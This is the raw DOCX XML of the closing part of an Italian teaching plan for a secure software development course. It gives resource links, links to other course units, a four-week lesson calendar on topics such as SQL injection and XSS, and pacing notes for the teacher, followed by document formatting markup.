    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Web Security Academy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(gratuita): https://portswigger.net/web-security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Garante Privacy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(provvedimenti italiani): https://www.garanteprivacy.it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">EU AI Act</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(testo italiano): https://eur-lex.europa.eu/eli/reg/2024/1689/oj</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="81"/>
    <w:bookmarkStart w:id="82" w:name="collegamenti-con-altre-uf"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Collegamenti con altre UF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760"/>
        <w:gridCol w:w="61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UF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Collegamento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UF 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">“Opportunità e rischi dell’IA”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">→ L7 Guida AI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UF 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">“Tecniche di redazione documentazione tecnica”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">→ L7 Template SECURITY.md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UF 9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">“Progettazione”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">→ L2 Threat Modeling + STRIDE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UF 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">“Scrittura del software”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">→ L3-L6 tutti i lab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UF 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">“Sviluppo del software”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">→ cookie, DB → L4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UF 12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">“Testing”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">→ test pytest in L3 (estensione possibile)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UF 13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">“Manutenzione”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">→ patching, pip-audit → L6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Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Template SECURITY.md compilato sul progetto di stage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82"/>
    <w:bookmarkEnd w:id="83"/>
    <w:bookmarkStart w:id="84" w:name="calendario-suggerito"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Calendario suggerito</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Distribuzione su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4 settimane × 2 lezioni di 2h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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Settimana</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lezioni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Argomenti chiave</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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L1 + L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fondamenti + OWASP/STRIDE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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L3 + L4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQLi + IDOR/bcrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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L5 + L6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">XSS/header + validation/supply chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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t xml:space="preserve">L7 + L8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Documentazione/AI + verifica finale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adattabile a: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8 settimane</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">× 1 lezione (più diluito)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2 settimane</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">× 4 lezioni (più intensivo)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2 giorni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">× 8h (workshop bootcamp — sconsigliato per discenti junior)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="84"/>
    <w:bookmarkStart w:id="88" w:name="note-finali-per-il-docente"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note finali per il docente</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="85" w:name="cosa-fare-se-rimani-indietro"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa fare se rimani indietro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">L3 in ritardo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: salta lo Step 4 del lab SQLi (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“perché filtrare non basta”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — rimanda alla Checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">L5 in ritardo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: copri solo XSS Reflected, lascia Stored e DOM-based come letture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">L6 in ritardo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: salta path traversal (è secondario), tieni Pydantic + pip-audit</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="85"/>
    <w:bookmarkStart w:id="86" w:name="cosa-fare-se-vai-avanti"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa fare se vai avanti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aggiungi un cenno di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in L5 (cookie SameSite c’è già)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aggiungi 30 min di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">JWT vs cookie session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in L4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Distribuisci i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">materiali EXTRA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del repo 32h come letture facoltative</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="86"/>
    <w:bookmarkStart w:id="87" w:name="feedback-raccolto-dopo-ogni-edizione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Feedback raccolto dopo ogni edizione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compila una nota dopo ogni lezione:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Cosa è andato bene</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Cosa è stato faticoso per gli allievi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Cosa cambierei la prossima volta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aggiorna questo piano a ogni edizione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Piano predisposto per il corso STEM IFTS — Anno formativo 2024/2025</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Versione 1.0 — Maggio 2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Autore: Ing. Alessandro Manneschi</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="87"/>
    <w:bookmarkEnd w:id="88"/>
    <w:bookmarkEnd w:id="89"/>
    <w:sectPr w:rsidR="009A4322">
      <w:headerReference r:id="rId8" w:type="default"/>
      <w:footerReference r:id="rId9" w:type="default"/>
      <w:pgSz w:h="16838" w:w="11906"/>
      <w:pgMar w:bottom="900" w:footer="708" w:gutter="0" w:header="708" w:left="1050" w:right="1050" w:top="900"/>
      <w:cols w:space="720"/>
      <w:docGrid w:linePitch="36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IBM Plex Sans">
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00002EF" w:usb1="5000207B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93F2735" w14:textId="77777777" w:rsidR="009A4322" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="2" w:space="0" w:color="C5D0E6"/>
      </w:pBdr>
      <w:spacing w:before="130"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Materiale riservato — uso didattico  |  Pag. </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="0008722E">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="64748B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/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313A3E4" w14:textId="77777777" w:rsidR="009A4322" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="3" w:space="0" w:color="1B3A6B"/>
      </w:pBdr>
      <w:spacing w:after="130"/>
    </w:pPr>
    <w:r w:rsidRPr="0008722E">
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">ITS Prodigi / ITS Empoli  |  SS4I S.r.l.  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">—  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1B3A6B"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Sviluppo Sicuro del Software v8</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">  —  Ing. Alessandro Manneschi</w:t>
    </w:r>
  </w:p>
</w:hdr>
</file>

<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
<w:numbering xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d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="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst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15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
  <w:abstractNum w15:restartNumberingAfterBreak="0" w:abstractNumId="0">
    <w:nsid w:val="19157A58"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="93CA1E14"/>
    <w:lvl w:ilvl="0" w:tplc="44AAA094">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E4927188">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D21E7346">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="AB5C76D4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1E9809AA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="3F923D0C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5E706B26">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0CC40C58">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="07745D54">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w15:restartNumberingAfterBreak="0" w:abstractNumId="1">
    <w:nsid w:val="222527EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91785160"/>
    <w:lvl w:ilvl="0" w:tplc="3076A35C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="70F842E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1080"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3B6E3A4C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="09369624">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="61F8FC46">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9F784870">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7DA24332">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2FD08AA6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="74CA037E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w15:restartNumberingAfterBreak="0" w:abstractNumId="2">
    <w:nsid w:val="283956C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF20C25A"/>
    <w:lvl w:ilvl="0" w:tplc="6B62EB36">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="237A7958">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9318ACAA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="2160"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9B3E1D9A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="2880"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0A2A5A1C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="3600"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="49025754">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="4320"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A4A284F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="5040"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4FB8D760">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="5760"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1AD82B0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="6480"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum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16cid:durableId="368724031" w:numId="1">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w16cid:durableId="363218855" w:numId="2">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w16cid:durableId="4522437" w:numId="3">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="1000">
    <w:abstractNumId w:val="990"/>
  </w:num>
  <w:num w:numId="1001">
    <w:abstractNumId w:val="991"/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1">
    <w:abstractNumId w:val="991"/>
  </w:num>
  <w:num w:numId="1022">
    <w:abstractNumId w:val="991"/>
  </w:num>
  <w:num w:numId="1023">
    <w:abstractNumId w:val="991"/>
  </w:num>
  <w:num w:numId="102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5">
    <w:abstractNumId w:val="991"/>
  </w:num>
  <w:num w:numId="1026">
    <w:abstractNumId w:val="991"/>
  </w:num>
  <w:num w:numId="1027">
    <w:abstractNumId w:val="991"/>
  </w:num>
  <w:num w:numId="102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9">
    <w:abstractNumId w:val="991"/>
  </w:num>
  <w:num w:numId="1030">
    <w:abstractNumId w:val="991"/>
  </w:num>
  <w:num w:numId="1031">
    <w:abstractNumId w:val="991"/>
  </w:num>
  <w:num w:numId="103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3">
    <w:abstractNumId w:val="991"/>
  </w:num>
  <w:num w:numId="1034">
    <w:abstractNumId w:val="991"/>
  </w:num>
  <w:num w:numId="1035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displayBackgroundShape/>
  <w:embedSystemFonts/>
  <w:proofState w:grammar="clean" w:spelling="clean"/>
  <w:stylePaneFormatFilter w:val="0004"/>
  <w:doNotTrackMoves/>
  <w:defaultTabStop w:val="708"/>
  <w:hyphenationZone w:val="283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A4322"/>
    <w:rsid w:val="0008722E"/>
    <w:rsid w:val="009A4322"/>
    <w:rsid w:val="00A75F51"/>
    <w:rsid w:val="00D7151D"/>
  </w:rsids>
  <w:themeFontLang w:val="it-IT"/>
  <w:clrSchemeMapping w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:bg1="light1" w:bg2="light2" w:followedHyperlink="followedHyperlink" w:hyperlink="hyperlink" w:t1="dark1" w:t2="dark2"/>
  <w:shapeDefaults>
    <o:shapedefaults spidmax="1026" v:ext="edit"/>
    <o:shapelayout v:ext="edit">
      <o:idmap data="1" v:ext="edit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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        <w:sz w:val="23"/>
        <w:szCs w:val="23"/>
        <w:lang w:bidi="ar-SA" w:eastAsia="it-IT" w:val="it-IT"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault/>
  </w:docDefaults>
